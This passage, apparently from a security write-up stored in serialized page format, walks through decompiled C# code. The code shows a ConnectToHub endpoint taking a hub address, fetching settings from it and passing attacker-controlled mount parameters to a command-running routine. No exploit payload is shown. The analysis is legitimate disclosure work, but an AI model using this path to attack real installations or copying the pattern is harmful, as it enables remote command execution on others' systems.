async",[1373,15024,15025],{"class":14938}," Task",[1373,15027,11852],{"class":1383},[1373,15029,15030],{"class":14938},"ActionResult",[1373,15032,11852],{"class":1383},[1373,15034,15035],{"class":14938},"ConnectToHubResult",[1373,15037,15038],{"class":1383},">>",[1373,15040,15041],{"class":7297}," ConnectToHub",[1373,15043,15044],{"class":1383},"([",[1373,15046,15047],{"class":14938},"FromBody",[1373,15049,15050],{"class":1383},"]",[1373,15052,15053],{"class":14938}," ConnectToHubInput",[1373,15055,15056],{"class":9372}," input",[1373,15058,11875],{"class":1383},[1373,15060,15061],{"class":1375,"line":4756},[1373,15062,8904],{"class":1383},[1373,15064,15065,15068,15070,15073,15075,15077,15080,15082,15084,15087,15089,15092,15094,15097,15099,15102],{"class":1375,"line":4768},[1373,15066,15067],{"class":4640},"    AdministrativeLog",[1373,15069,59],{"class":1383},[1373,15071,15072],{"class":7297},"Log",[1373,15074,1384],{"class":1383},[1373,15076,183],{"class":1387},[1373,15078,15079],{"class":1391},"Connecting to hub",[1373,15081,183],{"class":1387},[1373,15083,5437],{"class":1383},[1373,15085,15086],{"class":4640}," LogLevels",[1373,15088,59],{"class":1383},[1373,15090,15091],{"class":4640},"Normal",[1373,15093,5437],{"class":1383},[1373,15095,15096],{"class":6761}," base",[1373,15098,59],{"class":1383},[1373,15100,15101],{"class":4640},"HttpContext",[1373,15103,4680],{"class":1383},[1373,15105,15106,15109,15112,15114,15117,15120,15122,15125,15127,15130],{"class":1375,"line":4792},[1373,15107,15108],{"class":14938},"    ConnectToHubResult",[1373,15110,15111],{"class":9372}," connectToHubResult",[1373,15113,8575],{"class":1397},[1373,15115,15116],{"class":1397}," await",[1373,15118,15119],{"class":4640}," 
SystemSettingsService",[1373,15121,59],{"class":1383},[1373,15123,15124],{"class":7297},"ConnectToHub",[1373,15126,1384],{"class":1383},[1373,15128,15129],{"class":4640},"input",[1373,15131,4680],{"class":1383},[1373,15133,15134,15136,15139,15141,15143],{"class":1375,"line":4798},[1373,15135,15108],{"class":14938},[1373,15137,15138],{"class":9372}," connectToHubResult2",[1373,15140,8575],{"class":1397},[1373,15142,15111],{"class":4640},[1373,15144,4912],{"class":1383},[1373,15146,15147,15150,15152,15155,15157,15160,15162,15165,15167,15170],{"class":1375,"line":4806},[1373,15148,15149],{"class":4640},"    connectToHubResult2",[1373,15151,59],{"class":1383},[1373,15153,15154],{"class":4640},"machineName ",[1373,15156,5417],{"class":1397},[1373,15158,15159],{"class":4640}," HAClusterConfig",[1373,15161,59],{"class":1383},[1373,15163,15164],{"class":4640},"Instance",[1373,15166,59],{"class":1383},[1373,15168,15169],{"class":4640},"LocalName",[1373,15171,4912],{"class":1383},[1373,15173,15174,15176,15178,15180,15183,15185,15188],{"class":1375,"line":4817},[1373,15175,7340],{"class":4636},[1373,15177,15096],{"class":6761},[1373,15179,59],{"class":1383},[1373,15181,15182],{"class":7297},"CreateResponseMessage",[1373,15184,1384],{"class":1383},[1373,15186,15187],{"class":4640},"connectToHubResult2",[1373,15189,4680],{"class":1383},[1373,15191,15192],{"class":1375,"line":4825},[1373,15193,1855],{"class":1383},[18,15195,15196,15197,15199,15200,15203,15204,15207],{},"The task processes the JSON, checks for a set of values with light validation, and then makes a request to the value set for ",[886,15198,14882],{}," and decodes the JSON response. 
If the correct parameters are set, ",[886,15201,15202],{},"MountConfiguration.Mount(decodedObject.SystemMount, true)"," is run with the JSON object ",[886,15205,15206],{},"SystemMount"," containing the following parameters:",[22,15209,15210,15213,15216,15219],{},[25,15211,15212],{},"Enabled",[25,15214,15215],{},"ReadOnly",[25,15217,15218],{},"MountPath",[25,15220,14894],{},[1354,15222,15224],{"className":14927,"code":15223,"language":14929,"meta":219,"style":219},"public static async Task\u003CConnectToHubResult> ConnectToHub(ConnectToHubInput input)\n{\n    ConnectToHubResult connectToHubResult;\n    using (HttpClient client = new HttpClient())\n    {\n        try\n        {\n            var \u003C>f__AnonymousType = new\n            {\n                hubAddress = input.hubAddress,\n                oneTimePassword = input.oneTimePassword,\n                nodeName = NodeHAClusterConfig.Instance.LocalName\n            };\n            string text = JsonConvert.SerializeObject(\u003C>f__AnonymousType);\n            string text2 = input.hubAddress.TrimEnd('\u002F');\n            string text3 = text2 + \"\u002Fweb\u002Fapi\u002Fnode-management\u002Fsetup-initial-connection\";\n            Console.WriteLine(\"Connecting to hub with full URL: \" + text3 + \" with parameters:\\r\\n\" + text);\n            HttpResponseMessage httpResponseMessage = await client.PostAsync(new Uri(text3), new StringContent(text, Encoding.UTF8, \"application\u002Fjson\"));\n            HttpResponseMessage httpResponseMessage2 = httpResponseMessage;\n            string text4 = await httpResponseMessage2.Content.ReadAsStringAsync();\n            Console.WriteLine(\"Connecting to hub results: \" + text4);\n            SystemSettingsService.InitialConnectionResult decodedObject = JsonConvert.DeserializeObject\u003CSystemSettingsService.InitialConnectionResult>(text4);\n            if (decodedObject != null)\n            {\n                NodeHAClusterConfig haSettings = 
NodeHAClusterConfig.Instance;\n                string sharedSecret = decodedObject.SharedSecret;\n                Guid clusterId = decodedObject.ClusterId;\n                Dictionary\u003Cstring, string> targetHubs = decodedObject.TargetHubs;\n                bool isStandby = decodedObject.IsStandby;\n                try\n                {\n                    JObject settings = new JObject();\n                    if (clusterId != Guid.Empty)\n                    {\n                        settings[\"ClusterId\"] = clusterId.ToString();\n                    }\n                    settings[\"SharedSecret\"] = sharedSecret;\n                    object obj;\n                    if (targetHubs == null)\n                    {\n                        obj = null;\n                    }\n                    else\n                    {\n                        obj = targetHubs.ToDictionary((KeyValuePair\u003Cstring, string> k) => k.Key, (KeyValuePair\u003Cstring, string> v) => v.Value);\n                    }\n                    settings[\"TargetHubs\"] = JObject.FromObject(obj ?? 
new Dictionary\u003Cstring, string>());\n                    if (!isStandby)\n                    {\n                        if (!(await MountConfiguration.Mount(decodedObject.SystemMount, true)).success)\n                        {\n                            return new ConnectToHubResult\n                            {\n                                message = \"Failed to mount system mount point\",\n                                success = false\n                            };\n                        }\n                        FileManager.SetNewApplicationDataPath(Path.Combine(decodedObject.SystemMount.MountPath, \"System\"));\n                    }\n\n\n",[886,15225,15226,15254,15258,15266,15289,15293,15298,15302,15318,15322,15337,15353,15372,15377,15404,15434,15457,15500,15565,15578,15604,15627,15666,15683,15687,15705,15724,15743,15774,15793,15798,15803,15820,15842,15847,15873,15878,15899,15909,15925,15929,15940,15944,15949,15953,16028,16033,16081,16096,16101,16145,16151,16162,16168,16185,16196,16202,16208,16252],{"__ignoreMap":219},[1373,15227,15228,15230,15233,15235,15237,15239,15241,15243,15245,15247,15250,15252],{"class":1375,"line":1376},[1373,15229,15019],{"class":4652},[1373,15231,15232],{"class":4652}," static",[1373,15234,15022],{"class":4652},[1373,15236,15025],{"class":14938},[1373,15238,11852],{"class":1383},[1373,15240,15035],{"class":14938},[1373,15242,5384],{"class":1383},[1373,15244,15041],{"class":7297},[1373,15246,1384],{"class":1383},[1373,15248,15249],{"class":14938},"ConnectToHubInput",[1373,15251,15056],{"class":9372},[1373,15253,11875],{"class":1383},[1373,15255,15256],{"class":1375,"line":220},[1373,15257,8904],{"class":1383},[1373,15259,15260,15262,15264],{"class":1375,"line":1266},[1373,15261,15108],{"class":14938},[1373,15263,15111],{"class":9372},[1373,15265,4912],{"class":1383},[1373,15267,15268,15271,15273,15276,15279,15281,15284,15287],{"class":1375,"line":1852},[1373,15269,15270],{"class":4636},"    
using",[1373,15272,4641],{"class":1383},[1373,15274,15275],{"class":14938},"HttpClient",[1373,15277,15278],{"class":9372}," client",[1373,15280,8575],{"class":1397},[1373,15282,15283],{"class":1397}," new",[1373,15285,15286],{"class":14938}," HttpClient",[1373,15288,11781],{"class":1383},[1373,15290,15291],{"class":1375,"line":4692},[1373,15292,9613],{"class":1383},[1373,15294,15295],{"class":1375,"line":4724},[1373,15296,15297],{"class":4636},"        try\n",[1373,15299,15300],{"class":1375,"line":4756},[1373,15301,9788],{"class":1383},[1373,15303,15304,15307,15310,15313,15315],{"class":1375,"line":4768},[1373,15305,15306],{"class":4640},"            var ",[1373,15308,15309],{"class":1397},"\u003C>",[1373,15311,15312],{"class":4640},"f__AnonymousType ",[1373,15314,5417],{"class":1397},[1373,15316,15317],{"class":1397}," new\n",[1373,15319,15320],{"class":1375,"line":4792},[1373,15321,9814],{"class":1383},[1373,15323,15324,15327,15329,15331,15333,15335],{"class":1375,"line":4798},[1373,15325,15326],{"class":4640},"                hubAddress ",[1373,15328,5417],{"class":1397},[1373,15330,15056],{"class":4640},[1373,15332,59],{"class":1383},[1373,15334,14882],{"class":4640},[1373,15336,9062],{"class":1383},[1373,15338,15339,15342,15344,15346,15348,15351],{"class":1375,"line":4806},[1373,15340,15341],{"class":4640},"                oneTimePassword ",[1373,15343,5417],{"class":1397},[1373,15345,15056],{"class":4640},[1373,15347,59],{"class":1383},[1373,15349,15350],{"class":4640},"oneTimePassword",[1373,15352,9062],{"class":1383},[1373,15354,15355,15358,15360,15363,15365,15367,15369],{"class":1375,"line":4817},[1373,15356,15357],{"class":4640},"                nodeName ",[1373,15359,5417],{"class":1397},[1373,15361,15362],{"class":4640}," 
NodeHAClusterConfig",[1373,15364,59],{"class":1383},[1373,15366,15164],{"class":4640},[1373,15368,59],{"class":1383},[1373,15370,15371],{"class":4640},"LocalName\n",[1373,15373,15374],{"class":1375,"line":4825},[1373,15375,15376],{"class":1383},"            };\n",[1373,15378,15379,15382,15385,15387,15390,15392,15395,15397,15399,15402],{"class":1375,"line":4835},[1373,15380,15381],{"class":1397},"            string",[1373,15383,15384],{"class":9372}," text",[1373,15386,8575],{"class":1397},[1373,15388,15389],{"class":4640}," JsonConvert",[1373,15391,59],{"class":1383},[1373,15393,15394],{"class":7297},"SerializeObject",[1373,15396,1384],{"class":1383},[1373,15398,15309],{"class":1397},[1373,15400,15401],{"class":4640},"f__AnonymousType",[1373,15403,4680],{"class":1383},[1373,15405,15406,15408,15411,15413,15415,15417,15419,15421,15424,15426,15428,15430,15432],{"class":1375,"line":4843},[1373,15407,15381],{"class":1397},[1373,15409,15410],{"class":9372}," text2",[1373,15412,8575],{"class":1397},[1373,15414,15056],{"class":4640},[1373,15416,59],{"class":1383},[1373,15418,14882],{"class":4640},[1373,15420,59],{"class":1383},[1373,15422,15423],{"class":7297},"TrimEnd",[1373,15425,1384],{"class":1383},[1373,15427,1388],{"class":1387},[1373,15429,2180],{"class":1391},[1373,15431,1388],{"class":1387},[1373,15433,4680],{"class":1383},[1373,15435,15436,15438,15441,15443,15446,15449,15451,15453,15455],{"class":1375,"line":4849},[1373,15437,15381],{"class":1397},[1373,15439,15440],{"class":9372}," text3",[1373,15442,8575],{"class":1397},[1373,15444,15445],{"class":4640}," text2 ",[1373,15447,15448],{"class":1397},"+",[1373,15450,4883],{"class":1387},[1373,15452,14886],{"class":1391},[1373,15454,183],{"class":1387},[1373,15456,4912],{"class":1383},[1373,15458,15459,15462,15464,15467,15469,15471,15474,15476,15479,15482,15484,15486,15489,15492,15494,15496,15498],{"class":1375,"line":4877},[1373,15460,15461],{"class":4640},"            
Console",[1373,15463,59],{"class":1383},[1373,15465,15466],{"class":7297},"WriteLine",[1373,15468,1384],{"class":1383},[1373,15470,183],{"class":1387},[1373,15472,15473],{"class":1391},"Connecting to hub with full URL: ",[1373,15475,183],{"class":1387},[1373,15477,15478],{"class":1397}," +",[1373,15480,15481],{"class":4640}," text3 ",[1373,15483,15448],{"class":1397},[1373,15485,4883],{"class":1387},[1373,15487,15488],{"class":1391}," with parameters:",[1373,15490,15491],{"class":2326},"\\r\\n",[1373,15493,183],{"class":1387},[1373,15495,15478],{"class":1397},[1373,15497,15384],{"class":4640},[1373,15499,4680],{"class":1383},[1373,15501,15502,15505,15508,15510,15512,15514,15516,15519,15521,15524,15527,15529,15532,15535,15537,15540,15542,15544,15546,15549,15551,15554,15556,15558,15561,15563],{"class":1375,"line":4915},[1373,15503,15504],{"class":14938},"            HttpResponseMessage",[1373,15506,15507],{"class":9372}," httpResponseMessage",[1373,15509,8575],{"class":1397},[1373,15511,15116],{"class":1397},[1373,15513,15278],{"class":4640},[1373,15515,59],{"class":1383},[1373,15517,15518],{"class":7297},"PostAsync",[1373,15520,1384],{"class":1383},[1373,15522,15523],{"class":1397},"new",[1373,15525,15526],{"class":14938}," Uri",[1373,15528,1384],{"class":1383},[1373,15530,15531],{"class":4640},"text3",[1373,15533,15534],{"class":1383},"),",[1373,15536,15283],{"class":1397},[1373,15538,15539],{"class":14938}," StringContent",[1373,15541,1384],{"class":1383},[1373,15543,1359],{"class":4640},[1373,15545,5437],{"class":1383},[1373,15547,15548],{"class":4640}," Encoding",[1373,15550,59],{"class":1383},[1373,15552,15553],{"class":4640},"UTF8",[1373,15555,5437],{"class":1383},[1373,15557,4883],{"class":1387},[1373,15559,15560],{"class":1391},"application\u002Fjson",[1373,15562,183],{"class":1387},[1373,15564,1413],{"class":1383},[1373,15566,15567,15569,15572,15574,15576],{"class":1375,"line":4931},[1373,15568,15504],{"class":14938},[1373,15570,15571],{"class":9372}," 
httpResponseMessage2",[1373,15573,8575],{"class":1397},[1373,15575,15507],{"class":4640},[1373,15577,4912],{"class":1383},[1373,15579,15580,15582,15585,15587,15589,15591,15593,15596,15598,15601],{"class":1375,"line":4947},[1373,15581,15381],{"class":1397},[1373,15583,15584],{"class":9372}," text4",[1373,15586,8575],{"class":1397},[1373,15588,15116],{"class":1397},[1373,15590,15571],{"class":4640},[1373,15592,59],{"class":1383},[1373,15594,15595],{"class":4640},"Content",[1373,15597,59],{"class":1383},[1373,15599,15600],{"class":7297},"ReadAsStringAsync",[1373,15602,15603],{"class":1383},"();\n",[1373,15605,15606,15608,15610,15612,15614,15616,15619,15621,15623,15625],{"class":1375,"line":4952},[1373,15607,15461],{"class":4640},[1373,15609,59],{"class":1383},[1373,15611,15466],{"class":7297},[1373,15613,1384],{"class":1383},[1373,15615,183],{"class":1387},[1373,15617,15618],{"class":1391},"Connecting to hub results: ",[1373,15620,183],{"class":1387},[1373,15622,15478],{"class":1397},[1373,15624,15584],{"class":4640},[1373,15626,4680],{"class":1383},[1373,15628,15629,15632,15634,15637,15640,15642,15644,15646,15649,15651,15654,15656,15658,15661,15664],{"class":1375,"line":6776},[1373,15630,15631],{"class":14938},"            SystemSettingsService",[1373,15633,59],{"class":1383},[1373,15635,15636],{"class":14938},"InitialConnectionResult",[1373,15638,15639],{"class":9372}," 
decodedObject",[1373,15641,8575],{"class":1397},[1373,15643,15389],{"class":4640},[1373,15645,59],{"class":1383},[1373,15647,15648],{"class":7297},"DeserializeObject",[1373,15650,11852],{"class":1383},[1373,15652,15653],{"class":14938},"SystemSettingsService",[1373,15655,59],{"class":1383},[1373,15657,15636],{"class":14938},[1373,15659,15660],{"class":1383},">(",[1373,15662,15663],{"class":4640},"text4",[1373,15665,4680],{"class":1383},[1373,15667,15668,15670,15672,15675,15678,15681],{"class":1375,"line":6781},[1373,15669,9793],{"class":4636},[1373,15671,4641],{"class":1383},[1373,15673,15674],{"class":4640},"decodedObject ",[1373,15676,15677],{"class":1397},"!=",[1373,15679,15680],{"class":7054}," null",[1373,15682,11875],{"class":1383},[1373,15684,15685],{"class":1375,"line":7524},[1373,15686,9814],{"class":1383},[1373,15688,15689,15692,15695,15697,15699,15701,15703],{"class":1375,"line":7530},[1373,15690,15691],{"class":14938},"                NodeHAClusterConfig",[1373,15693,15694],{"class":9372}," haSettings",[1373,15696,8575],{"class":1397},[1373,15698,15362],{"class":4640},[1373,15700,59],{"class":1383},[1373,15702,15164],{"class":4640},[1373,15704,4912],{"class":1383},[1373,15706,15707,15710,15713,15715,15717,15719,15722],{"class":1375,"line":7546},[1373,15708,15709],{"class":1397},"                string",[1373,15711,15712],{"class":9372}," sharedSecret",[1373,15714,8575],{"class":1397},[1373,15716,15639],{"class":4640},[1373,15718,59],{"class":1383},[1373,15720,15721],{"class":4640},"SharedSecret",[1373,15723,4912],{"class":1383},[1373,15725,15726,15729,15732,15734,15736,15738,15741],{"class":1375,"line":7571},[1373,15727,15728],{"class":14938},"                Guid",[1373,15730,15731],{"class":9372}," 
clusterId",[1373,15733,8575],{"class":1397},[1373,15735,15639],{"class":4640},[1373,15737,59],{"class":1383},[1373,15739,15740],{"class":4640},"ClusterId",[1373,15742,4912],{"class":1383},[1373,15744,15745,15748,15750,15753,15755,15758,15760,15763,15765,15767,15769,15772],{"class":1375,"line":7598},[1373,15746,15747],{"class":14938},"                Dictionary",[1373,15749,11852],{"class":1383},[1373,15751,15752],{"class":1397},"string",[1373,15754,5437],{"class":1383},[1373,15756,15757],{"class":1397}," string",[1373,15759,5384],{"class":1383},[1373,15761,15762],{"class":9372}," targetHubs",[1373,15764,8575],{"class":1397},[1373,15766,15639],{"class":4640},[1373,15768,59],{"class":1383},[1373,15770,15771],{"class":4640},"TargetHubs",[1373,15773,4912],{"class":1383},[1373,15775,15776,15779,15782,15784,15786,15788,15791],{"class":1375,"line":7615},[1373,15777,15778],{"class":1397},"                bool",[1373,15780,15781],{"class":9372}," isStandby",[1373,15783,8575],{"class":1397},[1373,15785,15639],{"class":4640},[1373,15787,59],{"class":1383},[1373,15789,15790],{"class":4640},"IsStandby",[1373,15792,4912],{"class":1383},[1373,15794,15795],{"class":1375,"line":7635},[1373,15796,15797],{"class":4636},"                try\n",[1373,15799,15800],{"class":1375,"line":7640},[1373,15801,15802],{"class":1383},"                {\n",[1373,15804,15805,15808,15811,15813,15815,15818],{"class":1375,"line":7648},[1373,15806,15807],{"class":14938},"                    JObject",[1373,15809,15810],{"class":9372}," settings",[1373,15812,8575],{"class":1397},[1373,15814,15283],{"class":1397},[1373,15816,15817],{"class":14938}," JObject",[1373,15819,15603],{"class":1383},[1373,15821,15822,15825,15827,15830,15832,15835,15837,15840],{"class":1375,"line":7672},[1373,15823,15824],{"class":4636},"                    if",[1373,15826,4641],{"class":1383},[1373,15828,15829],{"class":4640},"clusterId ",[1373,15831,15677],{"class":1397},[1373,15833,15834],{"class":4640}," 
Guid",[1373,15836,59],{"class":1383},[1373,15838,15839],{"class":4640},"Empty",[1373,15841,11875],{"class":1383},[1373,15843,15844],{"class":1375,"line":7688},[1373,15845,15846],{"class":1383},"                    {\n",[1373,15848,15849,15852,15854,15856,15858,15860,15862,15864,15866,15868,15871],{"class":1375,"line":7709},[1373,15850,15851],{"class":4640},"                        settings",[1373,15853,7035],{"class":1383},[1373,15855,183],{"class":1387},[1373,15857,15740],{"class":1391},[1373,15859,183],{"class":1387},[1373,15861,15050],{"class":1383},[1373,15863,8575],{"class":1397},[1373,15865,15731],{"class":4640},[1373,15867,59],{"class":1383},[1373,15869,15870],{"class":7297},"ToString",[1373,15872,15603],{"class":1383},[1373,15874,15875],{"class":1375,"line":7714},[1373,15876,15877],{"class":1383},"                    }\n",[1373,15879,15880,15883,15885,15887,15889,15891,15893,15895,15897],{"class":1375,"line":7722},[1373,15881,15882],{"class":4640},"                    settings",[1373,15884,7035],{"class":1383},[1373,15886,183],{"class":1387},[1373,15888,15721],{"class":1391},[1373,15890,183],{"class":1387},[1373,15892,15050],{"class":1383},[1373,15894,8575],{"class":1397},[1373,15896,15712],{"class":4640},[1373,15898,4912],{"class":1383},[1373,15900,15901,15904,15907],{"class":1375,"line":9903},[1373,15902,15903],{"class":1397},"                    object",[1373,15905,15906],{"class":9372}," obj",[1373,15908,4912],{"class":1383},[1373,15910,15911,15913,15915,15918,15921,15923],{"class":1375,"line":9908},[1373,15912,15824],{"class":4636},[1373,15914,4641],{"class":1383},[1373,15916,15917],{"class":4640},"targetHubs ",[1373,15919,15920],{"class":1397},"==",[1373,15922,15680],{"class":7054},[1373,15924,11875],{"class":1383},[1373,15926,15927],{"class":1375,"line":9913},[1373,15928,15846],{"class":1383},[1373,15930,15931,15934,15936,15938],{"class":1375,"line":9932},[1373,15932,15933],{"class":4640},"                        obj 
",[1373,15935,5417],{"class":1397},[1373,15937,15680],{"class":7054},[1373,15939,4912],{"class":1383},[1373,15941,15942],{"class":1375,"line":9937},[1373,15943,15877],{"class":1383},[1373,15945,15946],{"class":1375,"line":9957},[1373,15947,15948],{"class":4636},"                    else\n",[1373,15950,15951],{"class":1375,"line":9962},[1373,15952,15846],{"class":1383},[1373,15954,15956,15958,15960,15962,15964,15967,15970,15973,15975,15977,15979,15981,15983,15986,15988,15990,15992,15994,15997,15999,16001,16003,16005,16007,16009,16011,16013,16016,16018,16020,16022,16024,16026],{"class":1375,"line":15955},45,[1373,15957,15933],{"class":4640},[1373,15959,5417],{"class":1397},[1373,15961,15762],{"class":4640},[1373,15963,59],{"class":1383},[1373,15965,15966],{"class":7297},"ToDictionary",[1373,15968,15969],{"class":1383},"((",[1373,15971,15972],{"class":14938},"KeyValuePair",[1373,15974,11852],{"class":1383},[1373,15976,15752],{"class":1397},[1373,15978,5437],{"class":1383},[1373,15980,15757],{"class":1397},[1373,15982,5384],{"class":1383},[1373,15984,15985],{"class":9372}," k",[1373,15987,2230],{"class":1383},[1373,15989,4986],{"class":1397},[1373,15991,15985],{"class":4640},[1373,15993,59],{"class":1383},[1373,15995,15996],{"class":4640},"Key",[1373,15998,5437],{"class":1383},[1373,16000,4641],{"class":1383},[1373,16002,15972],{"class":14938},[1373,16004,11852],{"class":1383},[1373,16006,15752],{"class":1397},[1373,16008,5437],{"class":1383},[1373,16010,15757],{"class":1397},[1373,16012,5384],{"class":1383},[1373,16014,16015],{"class":9372}," 
v",[1373,16017,2230],{"class":1383},[1373,16019,4986],{"class":1397},[1373,16021,16015],{"class":4640},[1373,16023,59],{"class":1383},[1373,16025,2750],{"class":4640},[1373,16027,4680],{"class":1383},[1373,16029,16031],{"class":1375,"line":16030},46,[1373,16032,15877],{"class":1383},[1373,16034,16036,16038,16040,16042,16044,16046,16048,16050,16052,16054,16057,16059,16062,16065,16067,16070,16072,16074,16076,16078],{"class":1375,"line":16035},47,[1373,16037,15882],{"class":4640},[1373,16039,7035],{"class":1383},[1373,16041,183],{"class":1387},[1373,16043,15771],{"class":1391},[1373,16045,183],{"class":1387},[1373,16047,15050],{"class":1383},[1373,16049,8575],{"class":1397},[1373,16051,15817],{"class":4640},[1373,16053,59],{"class":1383},[1373,16055,16056],{"class":7297},"FromObject",[1373,16058,1384],{"class":1383},[1373,16060,16061],{"class":4640},"obj ",[1373,16063,16064],{"class":1397},"??",[1373,16066,15283],{"class":1397},[1373,16068,16069],{"class":14938}," Dictionary",[1373,16071,11852],{"class":1383},[1373,16073,15752],{"class":1397},[1373,16075,5437],{"class":1383},[1373,16077,15757],{"class":1397},[1373,16079,16080],{"class":1383},">());\n",[1373,16082,16084,16086,16088,16091,16094],{"class":1375,"line":16083},48,[1373,16085,15824],{"class":4636},[1373,16087,4641],{"class":1383},[1373,16089,16090],{"class":1397},"!",[1373,16092,16093],{"class":4640},"isStandby",[1373,16095,11875],{"class":1383},[1373,16097,16099],{"class":1375,"line":16098},49,[1373,16100,15846],{"class":1383},[1373,16102,16104,16107,16109,16111,16113,16116,16119,16121,16124,16126,16129,16131,16133,16135,16137,16140,16143],{"class":1375,"line":16103},50,[1373,16105,16106],{"class":4636},"                        if",[1373,16108,4641],{"class":1383},[1373,16110,16090],{"class":1397},[1373,16112,1384],{"class":1383},[1373,16114,16115],{"class":1397},"await",[1373,16117,16118],{"class":4640}," 
MountConfiguration",[1373,16120,59],{"class":1383},[1373,16122,16123],{"class":7297},"Mount",[1373,16125,1384],{"class":1383},[1373,16127,16128],{"class":4640},"decodedObject",[1373,16130,59],{"class":1383},[1373,16132,15206],{"class":4640},[1373,16134,5437],{"class":1383},[1373,16136,14986],{"class":14985},[1373,16138,16139],{"class":1383},")).",[1373,16141,16142],{"class":4640},"success",[1373,16144,11875],{"class":1383},[1373,16146,16148],{"class":1375,"line":16147},51,[1373,16149,16150],{"class":1383},"                        {\n",[1373,16152,16154,16157,16159],{"class":1375,"line":16153},52,[1373,16155,16156],{"class":4636},"                            return",[1373,16158,15283],{"class":1397},[1373,16160,16161],{"class":14938}," ConnectToHubResult\n",[1373,16163,16165],{"class":1375,"line":16164},53,[1373,16166,16167],{"class":1383},"                            {\n",[1373,16169,16171,16174,16176,16178,16181,16183],{"class":1375,"line":16170},54,[1373,16172,16173],{"class":4640},"                                message ",[1373,16175,5417],{"class":1397},[1373,16177,4883],{"class":1387},[1373,16179,16180],{"class":1391},"Failed to mount system mount point",[1373,16182,183],{"class":1387},[1373,16184,9062],{"class":1383},[1373,16186,16188,16191,16193],{"class":1375,"line":16187},55,[1373,16189,16190],{"class":4640},"                                success ",[1373,16192,5417],{"class":1397},[1373,16194,16195],{"class":14985}," false\n",[1373,16197,16199],{"class":1375,"line":16198},56,[1373,16200,16201],{"class":1383},"                            };\n",[1373,16203,16205],{"class":1375,"line":16204},57,[1373,16206,16207],{"class":1383},"                        }\n",[1373,16209,16211,16214,16216,16219,16221,16224,16226,16229,16231,16233,16235,16237,16239,16241,16243,16245,16248,16250],{"class":1375,"line":16210},58,[1373,16212,16213],{"class":4640},"                        
FileManager",[1373,16215,59],{"class":1383},[1373,16217,16218],{"class":7297},"SetNewApplicationDataPath",[1373,16220,1384],{"class":1383},[1373,16222,16223],{"class":4640},"Path",[1373,16225,59],{"class":1383},[1373,16227,16228],{"class":7297},"Combine",[1373,16230,1384],{"class":1383},[1373,16232,16128],{"class":4640},[1373,16234,59],{"class":1383},[1373,16236,15206],{"class":4640},[1373,16238,59],{"class":1383},[1373,16240,15218],{"class":4640},[1373,16242,5437],{"class":1383},[1373,16244,4883],{"class":1387},[1373,16246,16247],{"class":1391},"System",[1373,16249,183],{"class":1387},[1373,16251,1413],{"class":1383},[1373,16253,16255],{"class":1375,"line":16254},59,[1373,16256,15877],{"class":1383},[18,16258,2245,16259,16261,16262,16265],{},[886,16260,16123],{}," task is then run with the attacker controlled parameters and ",[886,16263,16264],{},"MountConfiguration.RunCommand"," is executed:",[1354,16267,16269],{"className":14927,"code":16268,"language":14929,"meta":219,"style":219},"public static async Task\u003CSuccessResult> Mount(MountPointConfig mount, bool isSystemMount = false)\n{\n    string testFile = PathX.Combine(mount.MountPath, Guid.NewGuid().ToString());\n    SuccessResult successResult;\n    try\n    {\n        if (MountConfiguration.GetMountStatus(mount.MountPath) == MountState.Mounted)\n        {\n            successResult = SuccessResult.SuccessPacket;\n        }\n        else\n        {\n            MountConfiguration.MountInfo[mount.MountPath] = mount;\n            if (MountConfiguration.MountInfo[mount.MountPath].ReadOnly && !isSystemMount)\n            {\n                Exception ex = new Exception(\"Mount failed: \" + mount.MountPath + \" controlled by Hub\");\n                MountConfiguration.LogException(ex, \"\");\n                throw ex;\n            }\n            if (!string.IsNullOrWhiteSpace(mount.CommandMount) && mount.CommandMount != \"null\")\n            {\n                await 
MountConfiguration.RunCommand(mount.MountPath, mount.CommandMount, mount.UseArgumentsInCommand);\n            }\n\n",[886,16270,16271,16314,16318,16361,16371,16376,16380,16417,16421,16438,16442,16446,16450,16476,16512,16516,16560,16582,16591,16595,16640,16644,16683],{"__ignoreMap":219},[1373,16272,16273,16275,16277,16279,16281,16283,16286,16288,16291,16293,16296,16299,16301,16304,16307,16309,16312],{"class":1375,"line":1376},[1373,16274,15019],{"class":4652},[1373,16276,15232],{"class":4652},[1373,16278,15022],{"class":4652},[1373,16280,15025],{"class":14938},[1373,16282,11852],{"class":1383},[1373,16284,16285],{"class":14938},"SuccessResult",[1373,16287,5384],{"class":1383},[1373,16289,16290],{"class":7297}," Mount",[1373,16292,1384],{"class":1383},[1373,16294,16295],{"class":14938},"MountPointConfig",[1373,16297,16298],{"class":9372}," mount",[1373,16300,5437],{"class":1383},[1373,16302,16303],{"class":1397}," bool",[1373,16305,16306],{"class":9372}," isSystemMount",[1373,16308,8575],{"class":1397},[1373,16310,16311],{"class":14985}," false",[1373,16313,11875],{"class":1383},[1373,16315,16316],{"class":1375,"line":220},[1373,16317,8904],{"class":1383},[1373,16319,16320,16323,16326,16328,16331,16333,16335,16337,16340,16342,16344,16346,16348,16350,16353,16356,16358],{"class":1375,"line":1266},[1373,16321,16322],{"class":1397},"    string",[1373,16324,16325],{"class":9372}," testFile",[1373,16327,8575],{"class":1397},[1373,16329,16330],{"class":4640}," 
PathX",[1373,16332,59],{"class":1383},[1373,16334,16228],{"class":7297},[1373,16336,1384],{"class":1383},[1373,16338,16339],{"class":4640},"mount",[1373,16341,59],{"class":1383},[1373,16343,15218],{"class":4640},[1373,16345,5437],{"class":1383},[1373,16347,15834],{"class":4640},[1373,16349,59],{"class":1383},[1373,16351,16352],{"class":7297},"NewGuid",[1373,16354,16355],{"class":1383},"().",[1373,16357,15870],{"class":7297},[1373,16359,16360],{"class":1383},"());\n",[1373,16362,16363,16366,16369],{"class":1375,"line":1852},[1373,16364,16365],{"class":14938},"    SuccessResult",[1373,16367,16368],{"class":9372}," successResult",[1373,16370,4912],{"class":1383},[1373,16372,16373],{"class":1375,"line":4692},[1373,16374,16375],{"class":4636},"    try\n",[1373,16377,16378],{"class":1375,"line":4724},[1373,16379,9613],{"class":1383},[1373,16381,16382,16384,16386,16389,16391,16394,16396,16398,16400,16402,16404,16407,16410,16412,16415],{"class":1375,"line":4756},[1373,16383,9773],{"class":4636},[1373,16385,4641],{"class":1383},[1373,16387,16388],{"class":4640},"MountConfiguration",[1373,16390,59],{"class":1383},[1373,16392,16393],{"class":7297},"GetMountStatus",[1373,16395,1384],{"class":1383},[1373,16397,16339],{"class":4640},[1373,16399,59],{"class":1383},[1373,16401,15218],{"class":4640},[1373,16403,2230],{"class":1383},[1373,16405,16406],{"class":1397}," ==",[1373,16408,16409],{"class":4640}," 